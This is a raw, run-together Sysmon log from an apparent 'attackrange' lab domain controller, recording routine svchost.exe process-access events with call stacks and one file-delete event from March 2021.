12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.659{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-64C6-6064-A900-00000000AE01}34044568C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\